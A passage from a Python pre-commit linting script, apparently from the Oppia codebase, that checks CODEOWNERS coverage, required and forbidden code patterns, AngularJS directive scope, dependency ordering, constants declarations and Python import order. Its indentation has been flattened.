# syntax has paths starting with '/' which refers to
# full path relative to root, but python glob module
# does not conform to this logic and literally matches
# the '/' character. Therefore the leading '/' has to
# be changed to './' for glob patterns to match
# correctly.
line_in_concern = line_in_concern.replace('/', './', 1)
if not glob.glob(line_in_concern):
python_utils.PRINT(
'%s --> Pattern on line %s doesn\'t match '
'any file or directory' % (
CODEOWNER_FILEPATH, line_num + 1))
failed = True
# The following list is being populated with the
# paths in the CODEOWNERS file with the removal of the
# leading '/' to aid in the glob pattern matching in
# the next part of the check wherein the valid patterns
# are used to check if they cover the entire codebase.
if os.path.isdir(line_in_concern):
dir_patterns.append(line_in_concern)
else:
file_patterns.append(line_in_concern)
# Checks that every file (except those under the dir represented by
# the dir_patterns) is covered under CODEOWNERS.
for file_paths in _walk_with_gitignore('.', dir_patterns):
for file_path in file_paths:
match = False
for file_pattern in file_patterns:
if file_path in glob.glob(file_pattern):
match = True
break
if not match:
python_utils.PRINT(
'%s is not listed in the .github/CODEOWNERS file.' % (
file_path))
failed = True
failed = failed or (
check_for_important_patterns_at_bottom_of_codeowners(
important_rules_in_critical_section))
if failed:
summary_message = (
'%s CODEOWNERS file coverage check failed, see messages '
'above for files that need to be added or patterns that need '
'to be fixed.' % _MESSAGE_TYPE_FAILED)
else:
summary_message = '%s CODEOWNERS file check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
python_utils.PRINT('')
return summary_messages
class LintChecksManager( # pylint: disable=inherit-non-class
python_utils.with_metaclass(abc.ABCMeta, python_utils.OBJECT)):
"""Manages all the common linting functions. As an abstract base class, this
is not intended to be used directly.
Attributes:
all_filepaths: list(str). The list of filepaths to be linted.
parsed_js_files: dict. Contains the content of JS files, after
validating and parsing the files.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
def __init__(self, verbose_mode_enabled=False): # pylint: disable=super-init-not-called
"""Constructs a LintChecksManager object.
Args:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
# Set path for node.
# The path for node is set explicitly, since otherwise the lint
# tests fail on CircleCI due to the TypeScript files not being
# compilable.
node_path = os.path.join(os.pardir, 'oppia_tools/node-10.15.3')
os.environ['PATH'] = '%s/bin:' % node_path + os.environ['PATH']
self.verbose_mode_enabled = verbose_mode_enabled
self.process_manager = multiprocessing.Manager().dict()
@abc.abstractproperty
def all_filepaths(self):
"""Returns all file paths."""
pass
def _run_multiple_checks(self, *checks):
"""Run multiple checks in parallel."""
processes = []
for check in checks:
p = multiprocessing.Process(target=check)
processes.append(p)
p.start()
for p in processes:
p.join()
def _check_for_mandatory_pattern_in_file(
self, pattern_list, filepath, failed):
"""Checks for a given mandatory pattern in a file.
Args:
pattern_list: list(dict). The list of the mandatory patterns list to
be checked for in the file.
filepath: str. The path to the file to be linted.
failed: bool. Status of failure of the check.
Returns:
bool. The failure status of the check.
"""
# This boolean list keeps track of the regex matches
# found in the file.
pattern_found_list = []
file_content = FILE_CACHE.readlines(filepath)
for index, regexp_to_check in enumerate(
pattern_list):
if (any([filepath.endswith(
allowed_type) for allowed_type in (
regexp_to_check['included_types'])]) and (
not any([
filepath.endswith(
pattern) for pattern in (
regexp_to_check[
'excluded_files'] +
regexp_to_check[
'excluded_dirs'])]))):
pattern_found_list.append(index)
for line in file_content:
if regexp_to_check['regexp'].search(line):
pattern_found_list.pop()
break
if pattern_found_list:
failed = True
for pattern_found in pattern_found_list:
python_utils.PRINT('%s --> %s' % (
filepath,
pattern_list[pattern_found]['message']))
return failed
def _check_mandatory_patterns(self):
"""This function checks that all files contain the mandatory
patterns.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting mandatory patterns check')
python_utils.PRINT('----------------------------------------')
summary_messages = []
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
sets_of_patterns_to_match = [
MANDATORY_PATTERNS_REGEXP, MANDATORY_PATTERNS_JS_REGEXP]
for filepath in self.all_filepaths:
for pattern_list in sets_of_patterns_to_match:
failed = self._check_for_mandatory_pattern_in_file(
pattern_list, filepath, failed)
if failed:
summary_message = (
'%s Mandatory pattern check failed, see errors above for'
'patterns that should be added.' % _MESSAGE_TYPE_FAILED)
else:
summary_message = (
'%s Mandatory pattern check passed' % (
_MESSAGE_TYPE_SUCCESS))
python_utils.PRINT(summary_message)
python_utils.PRINT('')
summary_messages.append(summary_message)
self.process_manager['mandatory'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_bad_patterns(self):
"""This function is used for detecting bad patterns."""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting Pattern Checks')
python_utils.PRINT('----------------------------------------')
total_files_checked = 0
total_error_count = 0
summary_messages = []
all_filepaths = [
filepath for filepath in self.all_filepaths if not (
filepath.endswith('pre_commit_linter.py') or
any(
fnmatch.fnmatch(filepath, pattern)
for pattern in EXCLUDED_PATHS)
)]
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in all_filepaths:
file_content = FILE_CACHE.read(filepath)
total_files_checked += 1
for pattern in BAD_PATTERNS:
if (pattern in file_content and
not _is_filepath_excluded_for_bad_patterns_check(
pattern, filepath)):
failed = True
python_utils.PRINT('%s --> %s' % (
filepath, BAD_PATTERNS[pattern]['message']))
python_utils.PRINT('')
total_error_count += 1
for regexp in BAD_PATTERNS_REGEXP:
if _check_bad_pattern_in_file(
filepath, file_content, regexp):
failed = True
total_error_count += 1
temp_failed, temp_count = _check_file_type_specific_bad_pattern(
filepath, file_content)
failed = failed or temp_failed
total_error_count += temp_count
if filepath == 'constants.ts':
for pattern in REQUIRED_STRINGS_CONSTANTS:
if pattern not in file_content:
failed = True
python_utils.PRINT('%s --> %s' % (
filepath,
REQUIRED_STRINGS_CONSTANTS[pattern]['message']))
python_utils.PRINT('')
total_error_count += 1
if failed:
summary_message = (
'%s Pattern check failed, see errors above '
'for patterns that should be removed.' % (
_MESSAGE_TYPE_FAILED))
summary_messages.append(summary_message)
else:
summary_message = '%s Pattern checks passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT('')
if total_files_checked == 0:
python_utils.PRINT('There are no files to be checked.')
else:
python_utils.PRINT('(%s files checked, %s errors found)' % (
total_files_checked, total_error_count))
python_utils.PRINT(summary_message)
self.process_manager['bad_pattern'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_patterns(self):
"""Run checks relate to bad patterns."""
methods = [self._check_bad_patterns, self._check_mandatory_patterns]
self._run_multiple_checks(*methods)
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
all_messages: str. All the messages returned by the lint checks.
"""
self._check_patterns()
mandatory_patterns_messages = self.process_manager['mandatory']
pattern_messages = self.process_manager['bad_pattern']
return (
mandatory_patterns_messages + pattern_messages)
class JsTsLintChecksManager(LintChecksManager):
"""Manages all the Js and Ts linting functions.
Attributes:
all_filepaths: list(str). The list of filepaths to be linted.
js_filepaths: list(str): The list of js filepaths to be linted.
ts_filepaths: list(str): The list of ts filepaths to be linted.
parsed_js_and_ts_files: dict. Contains the content of JS files, after
validating and parsing the files.
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
def __init__(self, verbose_mode_enabled=False):
"""Constructs a JsTsLintChecksManager object.
Args:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
node_path = os.path.join(os.pardir, 'oppia_tools/node-10.15.3')
os.environ['PATH'] = '%s/bin:' % node_path + os.environ['PATH']
super(JsTsLintChecksManager, self).__init__(
verbose_mode_enabled=verbose_mode_enabled)
self.parsed_js_and_ts_files = []
self.parsed_expressions_in_files = []
@property
def js_filepaths(self):
"""Return all js filepaths."""
return _FILES['.js']
@property
def ts_filepaths(self):
"""Return all ts filepaths."""
return _FILES['.ts']
@property
def all_filepaths(self):
"""Return all filepaths."""
return self.js_filepaths + self.ts_filepaths
def _validate_and_parse_js_and_ts_files(self):
"""This function validates JavaScript and Typescript files and
returns the parsed contents as a Python dictionary.
Returns:
dict. contains the contents of js and ts files after
validating and parsing the files.
"""
# Select JS files which need to be checked.
files_to_check = [
filepath for filepath in self.all_filepaths if
not any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
parsed_js_and_ts_files = dict()
if not files_to_check:
return parsed_js_and_ts_files
compiled_js_dir = tempfile.mkdtemp(
dir=os.getcwd(), prefix='tmpcompiledjs')
if not self.verbose_mode_enabled:
python_utils.PRINT('Validating and parsing JS and TS files ...')
for filepath in files_to_check:
if self.verbose_mode_enabled:
python_utils.PRINT(
'Validating and parsing %s file ...' % filepath)
file_content = FILE_CACHE.read(filepath)
try:
# Use esprima to parse a JS or TS file.
parsed_js_and_ts_files[filepath] = esprima.parseScript(
file_content, comment=True)
except Exception as e:
# Compile typescript file which has syntax not valid for JS
# file.
if filepath.endswith('.js'):
shutil.rmtree(compiled_js_dir)
raise Exception(e)
try:
compiled_js_filepath = self._compile_ts_file(
filepath, compiled_js_dir)
file_content = FILE_CACHE.read(compiled_js_filepath)
parsed_js_and_ts_files[filepath] = esprima.parseScript(
file_content)
except Exception as e:
shutil.rmtree(compiled_js_dir)
raise Exception(e)
shutil.rmtree(compiled_js_dir)
return parsed_js_and_ts_files
def _get_expressions_from_parsed_script(self):
"""This function returns the expressions in the script parsed using
js and ts files.
Returns:
dict. contains the expressions in the script parsed using js
and ts files.
"""
parsed_expressions_in_files = collections.defaultdict(dict)
components_to_check = ['controller', 'directive', 'factory', 'filter']
for filepath, parsed_script in self.parsed_js_and_ts_files.items():
parsed_expressions_in_files[filepath] = collections.defaultdict(
list)
parsed_nodes = parsed_script.body
for parsed_node in parsed_nodes:
for component in components_to_check:
expression = _get_expression_from_node_if_one_exists(
parsed_node, [component])
parsed_expressions_in_files[filepath][component].append(
expression)
return parsed_expressions_in_files
def _compile_ts_file(self, filepath, dir_path):
"""Compiles a typescript file and returns the path for compiled
js file.
"""
allow_js = 'true'
lib = 'es2017,dom'
no_implicit_use_strict = 'true'
skip_lib_check = 'true'
target = 'es5'
type_roots = './node_modules/@types'
cmd = (
'./node_modules/typescript/bin/tsc -outDir %s -allowJS %s '
'-lib %s -noImplicitUseStrict %s -skipLibCheck '
'%s -target %s -typeRoots %s %s typings/*') % (
dir_path, allow_js, lib, no_implicit_use_strict,
skip_lib_check, target, type_roots, filepath)
subprocess.call(cmd, shell=True, stdout=subprocess.PIPE)
compiled_js_filepath = os.path.join(
dir_path, os.path.basename(filepath).replace('.ts', '.js'))
return compiled_js_filepath
def _check_extra_js_files(self):
"""Checks if the changes made include extra js files in core
or extensions folder which are not specified in
build.JS_FILEPATHS_NOT_TO_BUILD.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting extra js files check')
python_utils.PRINT('----------------------------------------')
summary_messages = []
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
js_files_to_check = self.js_filepaths
for filepath in js_files_to_check:
if filepath.startswith(('core/templates', 'extensions')) and (
filepath not in build.JS_FILEPATHS_NOT_TO_BUILD) and (
not filepath.endswith('protractor.js')):
python_utils.PRINT(
'%s --> Found extra .js file\n' % filepath)
failed = True
if failed:
err_msg = (
'If you want the above files to be present as js files, '
'add them to the list JS_FILEPATHS_NOT_TO_BUILD in '
'build.py. Otherwise, rename them to .ts\n')
python_utils.PRINT(err_msg)
if failed:
summary_message = (
'%s Extra JS files check failed, see '
'message above on resolution steps.' % (
_MESSAGE_TYPE_FAILED))
else:
summary_message = '%s Extra JS files check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
python_utils.PRINT('')
self.process_manager['extra'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_js_and_ts_component_name_and_count(self):
"""This function ensures that all JS/TS files have exactly
one component and and that the name of the component
matches the filename.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting js component name and count check')
python_utils.PRINT('----------------------------------------')
# Select JS files which need to be checked.
files_to_check = [
filepath for filepath in self.all_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)
and (not filepath.endswith('App.ts'))]
failed = False
summary_messages = []
components_to_check = ['controller', 'directive', 'factory', 'filter']
stdout = python_utils.string_io()
for filepath in files_to_check:
component_num = 0
parsed_expressions = self.parsed_expressions_in_files[filepath]
with _redirect_stdout(stdout):
for component in components_to_check:
if component_num > 1:
break
for expression in parsed_expressions[component]:
if not expression:
continue
component_num += 1
# Check if the number of components in each file exceeds
# one.
if component_num > 1:
python_utils.PRINT(
'%s -> Please ensure that there is exactly one '
'component in the file.' % (filepath))
failed = True
break
with _redirect_stdout(stdout):
if failed:
summary_message = (
'%s JS and TS Component name and count check failed, '
'see messages above for duplicate names.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s JS and TS Component name and count check passed' %
(_MESSAGE_TYPE_SUCCESS))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
self.process_manager['component'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_directive_scope(self):
"""This function checks that all directives have an explicit
scope: {} and it should not be scope: true.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting directive scope check')
python_utils.PRINT('----------------------------------------')
# Select JS and TS files which need to be checked.
files_to_check = [
filepath for filepath in self.all_filepaths if
not any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
summary_messages = []
components_to_check = ['directive']
stdout = python_utils.string_io()
for filepath in files_to_check:
parsed_expressions = self.parsed_expressions_in_files[filepath]
with _redirect_stdout(stdout):
# Parse the body of the content as nodes.
for component in components_to_check:
for expression in parsed_expressions[component]:
if not expression:
continue
# Separate the arguments of the expression.
arguments = expression.arguments
# The first argument of the expression is the
# name of the directive.
if arguments[0].type == 'Literal':
directive_name = str(arguments[0].value)
arguments = arguments[1:]
for argument in arguments:
# Check the type of an argument.
if argument.type != 'ArrayExpression':
continue
# Separate out the elements for the argument.
elements = argument.elements
for element in elements:
# Check the type of an element.
if element.type != 'FunctionExpression':
continue
# Separate out the body of the element.
body = element.body
if body.type != 'BlockStatement':
continue
# Further separate the body elements from the
# body.
body_elements = body.body
for body_element in body_elements:
# Check if the body element is a return
# statement.
body_element_type_is_not_return = (
body_element.type != 'ReturnStatement')
body_element_arg_type_is_not_object = (
body_element.argument.type != (
'ObjectExpression'))
if (
body_element_arg_type_is_not_object
or (
body_element_type_is_not_return
)):
continue
# Separate the properties of the return
# node.
return_node_properties = (
body_element.argument.properties)
# Loop over all the properties of the return
# node to find out the scope key.
for return_node_property in (
return_node_properties):
# Check whether the property is scope.
property_key_is_an_identifier = (
return_node_property.key.type == (
'Identifier'))
property_key_name_is_scope = (
return_node_property.key.name == (
'scope'))
if (
property_key_is_an_identifier
and (
property_key_name_is_scope
)):
# Separate the scope value and
# check if it is an Object
# Expression. If it is not, then
# check for scope: true and report
# the error message.
scope_value = (
return_node_property.value)
if (
scope_value.type == (
'Literal')
and (
scope_value.value)):
failed = True
python_utils.PRINT(
'Please ensure that %s '
'directive in %s file '
'does not have scope set '
'to true.' %
(directive_name, filepath))
python_utils.PRINT('')
elif scope_value.type != (
'ObjectExpression'):
# Check whether the directive
# has scope: {} else report
# the error message.
failed = True
python_utils.PRINT(
'Please ensure that %s '
'directive in %s file has '
'a scope: {}.' % (
directive_name, filepath
))
python_utils.PRINT('')
with _redirect_stdout(stdout):
if failed:
summary_message = (
'%s Directive scope check failed, '
'see messages above for suggested fixes.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = '%s Directive scope check passed' % (
_MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
self.process_manager['directive'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_sorted_dependencies(self):
"""This function checks that the dependencies which are
imported in the controllers/directives/factories in JS
files are in following pattern: dollar imports, regular
imports, and constant imports, all in sorted order.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting sorted dependencies check')
python_utils.PRINT('----------------------------------------')
files_to_check = [
filepath for filepath in self.all_filepaths if
not any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
components_to_check = ['controller', 'directive', 'factory']
failed = False
summary_messages = []
stdout = python_utils.string_io()
for filepath in files_to_check:
parsed_expressions = self.parsed_expressions_in_files[filepath]
with _redirect_stdout(stdout):
for component in components_to_check:
for expression in parsed_expressions[component]:
if not expression:
continue
# Separate the arguments of the expression.
arguments = expression.arguments
if arguments[0].type == 'Literal':
property_value = str(arguments[0].value)
arguments = arguments[1:]
for argument in arguments:
if argument.type != 'ArrayExpression':
continue
literal_args = []
function_args = []
dollar_imports = []
regular_imports = []
constant_imports = []
elements = argument.elements
for element in elements:
if element.type == 'Literal':
literal_args.append(str(element.value))
elif element.type == 'FunctionExpression':
func_args = element.params
for func_arg in func_args:
function_args.append(str(func_arg.name))
for arg in function_args:
if arg.startswith('$'):
dollar_imports.append(arg)
elif re.search('[a-z]', arg):
regular_imports.append(arg)
else:
constant_imports.append(arg)
dollar_imports.sort()
regular_imports.sort()
constant_imports.sort()
sorted_imports = (
dollar_imports + regular_imports + (
constant_imports))
if sorted_imports != function_args:
failed = True
python_utils.PRINT(
'Please ensure that in %s in file %s, the '
'injected dependencies should be in the '
'following manner: dollar imports, regular '
'imports and constant imports, all in '
'sorted order.'
% (property_value, filepath))
if sorted_imports != literal_args:
failed = True
python_utils.PRINT(
'Please ensure that in %s in file %s, the '
'stringfied dependencies should be in the '
'following manner: dollar imports, regular '
'imports and constant imports, all in '
'sorted order.'
% (property_value, filepath))
with _redirect_stdout(stdout):
if failed:
summary_message = (
'%s Sorted dependencies check failed, fix files that '
'that don\'t have sorted dependencies mentioned above.' % (
_MESSAGE_TYPE_FAILED))
else:
summary_message = (
'%s Sorted dependencies check passed' % (
_MESSAGE_TYPE_SUCCESS))
summary_messages.append(summary_message)
python_utils.PRINT('')
python_utils.PRINT(summary_message)
if self.verbose_mode_enabled:
python_utils.PRINT('----------------------------------------')
self.process_manager['sorted'] = summary_messages
_STDOUT_LIST.append(stdout)
def _match_line_breaks_in_controller_dependencies(self):
"""This function checks whether the line breaks between the dependencies
listed in the controller of a directive or service exactly match those
between the arguments of the controller function.
"""
if self.verbose_mode_enabled:
python_utils.PRINT(
'Starting controller dependency line break check')
python_utils.PRINT('----------------------------------------')
files_to_check = [
filepath for filepath in self.all_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
summary_messages = []
# For RegExp explanation, please see https://regex101.com/r/T85GWZ/2/.
pattern_to_match = (
r'controller.* \[(?P<stringfied_dependencies>[\S\s]*?)' +
r'function\((?P<function_parameters>[\S\s]*?)\)')
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in files_to_check:
file_content = FILE_CACHE.read(filepath)
matched_patterns = re.findall(pattern_to_match, file_content)
for matched_pattern in matched_patterns:
stringfied_dependencies, function_parameters = (
matched_pattern)
stringfied_dependencies = (
stringfied_dependencies.strip().replace(
'\'', '').replace(' ', ''))[:-1]
function_parameters = (
function_parameters.strip().replace(' ', ''))
if stringfied_dependencies != function_parameters:
failed = True
python_utils.PRINT(
'Please ensure that in file %s the line breaks '
'pattern between the dependencies mentioned as '
'strings:\n[%s]\nand the dependencies mentioned '
'as function parameters: \n(%s)\nfor the '
'corresponding controller should '
'exactly match.' % (
filepath, stringfied_dependencies,
function_parameters))
python_utils.PRINT('')
if failed:
summary_message = (
'%s Controller dependency line break check failed, '
'see messages above for the affected files.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s Controller dependency line break check passed' % (
_MESSAGE_TYPE_SUCCESS))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
self.process_manager['line_breaks'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_constants_declaration(self):
"""Checks the declaration of constants in the TS files to ensure that
the constants are not declared in files other than *.constants.ajs.ts
and that the constants are declared only single time. This also checks
that the constants are declared in both *.constants.ajs.ts (for
AngularJS) and in *.constants.ts (for Angular 8).
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting constants declaration check')
python_utils.PRINT('----------------------------------------')
summary_messages = []
failed = False
with _redirect_stdout(_TARGET_STDOUT):
ts_files_to_check = self.ts_filepaths
constants_to_source_filepaths_dict = {}
angularjs_source_filepaths_to_constants_dict = {}
for filepath in ts_files_to_check:
# The following block extracts the corresponding Angularjs
# constants file for the Angular constants file. This is
# required since the check cannot proceed if the AngularJS
# constants file is not provided before the Angular constants
# file.
if filepath.endswith('.constants.ts'):
filename_without_extension = filepath[:-3]
corresponding_angularjs_filepath = (
filename_without_extension + '.ajs.ts')
compiled_js_dir = tempfile.mkdtemp(dir=os.getcwd())
try:
if os.path.isfile(corresponding_angularjs_filepath):
compiled_js_filepath = self._compile_ts_file(
corresponding_angularjs_filepath,
compiled_js_dir)
file_content = FILE_CACHE.read(
compiled_js_filepath).decode('utf-8')
parsed_script = esprima.parseScript(file_content)
parsed_nodes = parsed_script.body
angularjs_constants_list = []
components_to_check = ['constant']
for parsed_node in parsed_nodes:
expression = (
_get_expression_from_node_if_one_exists(
parsed_node, components_to_check))
if not expression:
continue
else:
# The following block populates a set to
# store constants for the Angular-AngularJS
# constants file consistency check.
angularjs_constants_name = (
expression.arguments[0].value)
angularjs_constants_value = (
expression.arguments[1].property.name)
if angularjs_constants_value != (
angularjs_constants_name):
failed = True
python_utils.PRINT(
'%s --> Please ensure that the '
'constant %s is initialized '
'from the value from the '
'corresponding Angular constants'
' file (the *.constants.ts '
'file). Please create one in the'
' Angular constants file if it '
'does not exist there.' % (
filepath,
angularjs_constants_name))
angularjs_constants_list.append(
angularjs_constants_name)
angularjs_constants_set = set(
angularjs_constants_list)
if len(angularjs_constants_set) != len(
angularjs_constants_list):
failed = True
python_utils.PRINT(
'%s --> Duplicate constant declaration '
'found.' % (
corresponding_angularjs_filepath))
angularjs_source_filepaths_to_constants_dict[
corresponding_angularjs_filepath] = (
angularjs_constants_set)
else:
failed = True
python_utils.PRINT(
'%s --> Corresponding AngularJS constants '
'file not found.' % filepath)
finally:
shutil.rmtree(compiled_js_dir)
# Check that the constants are declared only in a
# *.constants.ajs.ts file.
if not filepath.endswith('.constants.ajs.ts'):
for line_num, line in enumerate(FILE_CACHE.readlines(
filepath)):
if 'oppia.constant(' in line:
failed = True
python_utils.PRINT(
'%s --> Constant declaration found at line '
'%s. Please declare the constants in a '
'separate constants file.' % (
filepath, line_num))
# Check if the constant has multiple declarations which is
# prohibited.
parsed_script = self.parsed_js_and_ts_files[filepath]
parsed_nodes = parsed_script.body
components_to_check = ['constant']
angular_constants_list = []
for parsed_node in parsed_nodes:
expression = _get_expression_from_node_if_one_exists(
parsed_node, components_to_check)
if not expression:
continue
else:
constant_name = expression.arguments[0].raw
if constant_name in constants_to_source_filepaths_dict:
failed = True
python_utils.PRINT(
'%s --> The constant %s is already declared '
'in %s. Please import the file where the '
'constant is declared or rename the constant'
'.' % (
filepath, constant_name,
constants_to_source_filepaths_dict[
constant_name]))
else:
constants_to_source_filepaths_dict[
constant_name] = filepath
# Checks that the *.constants.ts and the corresponding
# *.constants.ajs.ts file are in sync.
if filepath.endswith('.constants.ts'):
angular_constants_nodes = (
parsed_nodes[1].declarations[0].init.callee.body.body)
for angular_constant_node in angular_constants_nodes:
if not angular_constant_node.expression:
continue
angular_constant_name = (
angular_constant_node.expression.left.property.name)
angular_constants_list.append(angular_constant_name)
angular_constants_set = set(angular_constants_list)
if len(angular_constants_set) != len(
angular_constants_list):
failed = True
python_utils.PRINT(
'%s --> Duplicate constant declaration found.'
% filepath)
if corresponding_angularjs_filepath in (
angularjs_source_filepaths_to_constants_dict):
angular_minus_angularjs_constants = (
angular_constants_set.difference(
angularjs_source_filepaths_to_constants_dict[
corresponding_angularjs_filepath]))
for constant in angular_minus_angularjs_constants:
failed = True
python_utils.PRINT(
'%s --> The constant %s is not declared '
'in the corresponding angularjs '
'constants file.' % (filepath, constant))
if failed:
summary_message = (
'%s Constants declaration check failed, '
'see messages above for constants with errors.' % (
_MESSAGE_TYPE_FAILED))
else:
summary_message = '%s Constants declaration check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT(summary_message)
return summary_messages
def _check_dependencies(self):
"""Check the dependencies related issues. This runs
_check_sorted_dependencies and
_match_line_breaks_in_controller_dependencies
in parallel.
"""
methods = [
self._check_sorted_dependencies,
self._match_line_breaks_in_controller_dependencies
]
super(JsTsLintChecksManager, self)._run_multiple_checks(*methods)
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
all_messages: str. All the messages returned by the lint checks.
"""
self.parsed_js_and_ts_files = self._validate_and_parse_js_and_ts_files()
self.parsed_expressions_in_files = (
self._get_expressions_from_parsed_script())
common_messages = super(
JsTsLintChecksManager, self).perform_all_lint_checks()
super(JsTsLintChecksManager, self)._run_multiple_checks(
self._check_extra_js_files,
self._check_js_and_ts_component_name_and_count,
self._check_directive_scope
)
self._check_dependencies()
extra_js_files_messages = self.process_manager['extra']
js_and_ts_component_messages = self.process_manager['component']
directive_scope_messages = self.process_manager['directive']
sorted_dependencies_messages = self.process_manager['sorted']
controller_dependency_messages = self.process_manager['line_breaks']
all_messages = (
common_messages + extra_js_files_messages +
js_and_ts_component_messages + directive_scope_messages +
sorted_dependencies_messages + controller_dependency_messages)
return all_messages
def _check_html_directive_name(self):
"""This function checks that all HTML directives end
with _directive.html.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting HTML directive name check')
python_utils.PRINT('----------------------------------------')
total_files_checked = 0
total_error_count = 0
files_to_check = [
filepath for filepath in self.all_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
summary_messages = []
# For RegExp explanation, please see https://regex101.com/r/gU7oT6/37.
pattern_to_match = (
r'templateUrl: UrlInterpolationService\.[A-z\(]+' +
r'(?P<directive_name>[^\)]+)')
with _redirect_stdout(_TARGET_STDOUT):
for filepath in files_to_check:
file_content = FILE_CACHE.read(filepath)
total_files_checked += 1
matched_patterns = re.findall(pattern_to_match, file_content)
for matched_pattern in matched_patterns:
matched_pattern = matched_pattern.split()
directive_filepath = ''.join(matched_pattern).replace(
'\'', '').replace('+', '')
if not directive_filepath.endswith('_directive.html'):
failed = True
total_error_count += 1
python_utils.PRINT(
'%s --> Please ensure that this file ends'
'with _directive.html.' % directive_filepath)
python_utils.PRINT('')
if failed:
summary_message = (
'%s HTML directive name check failed, see files above '
'that did not end with _directive.html but '
'should have.' % _MESSAGE_TYPE_FAILED)
summary_messages.append(summary_message)
else:
summary_message = '%s HTML directive name check passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT('')
if total_files_checked == 0:
if self.verbose_mode_enabled:
python_utils.PRINT('There are no files to be checked.')
else:
python_utils.PRINT('(%s files checked, %s errors found)' % (
total_files_checked, total_error_count))
python_utils.PRINT(summary_message)
return summary_messages
class OtherLintChecksManager(LintChecksManager):
"""Manages all the linting functions except the ones against Js and Ts. It
checks Python, CSS, and HTML files.
Attributes:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
def __init__(
self, verbose_mode_enabled=False):
"""Constructs a OtherLintChecksManager object.
Args:
verbose_mode_enabled: bool. True if verbose mode is enabled.
"""
super(OtherLintChecksManager, self).__init__(
verbose_mode_enabled=verbose_mode_enabled)
@property
def py_filepaths(self):
"""Return all python filepaths."""
return _FILES['.py']
@property
def html_filepaths(self):
"""Return all html filepaths."""
return _FILES['.html']
@property
def other_filepaths(self):
"""Return other filepaths."""
return _FILES['other']
@property
def css_filepaths(self):
"""Return css filepaths."""
return _FILES['.css']
@property
def all_filepaths(self):
"""Return all filepaths."""
return (
self.css_filepaths + self.html_filepaths +
self.other_filepaths + self.py_filepaths)
def _check_import_order(self):
"""This function is used to check that each file
has imports placed in alphabetical order.
"""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting import-order checks')
python_utils.PRINT('----------------------------------------')
summary_messages = []
files_to_check = [
filepath for filepath in self.py_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
failed = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in files_to_check:
# This line prints the error message along with file path
# and returns True if it finds an error else returns False
# If check is set to True, isort simply checks the file and
# if check is set to False, it autocorrects import-order errors.
if (isort.SortImports(
filepath, check=True, show_diff=(
True)).incorrectly_sorted):
failed = True
python_utils.PRINT('')
python_utils.PRINT('')
if failed:
summary_message = (
'%s Import order checks failed, file imports should be '
'alphabetized, see affect files above.' % (
_MESSAGE_TYPE_FAILED))
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s Import order checks passed' % _MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
self.process_manager['import'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_import(self):
"""Run checks relates to import order."""
methods = [self._check_import_order]
super(OtherLintChecksManager, self)._run_multiple_checks(*methods)
def _check_docstring(self):
"""Run checks related to docstring."""
methods = [self._check_docstrings]
super(OtherLintChecksManager, self)._run_multiple_checks(*methods)
def _check_docstrings(self):
"""This function ensures that docstrings end in a period and the arg
order in the function definition matches the order in the doc string.
Returns:
summary_messages: list(str). Summary of messages generated by the
check.
"""
if self.verbose_mode_enabled:
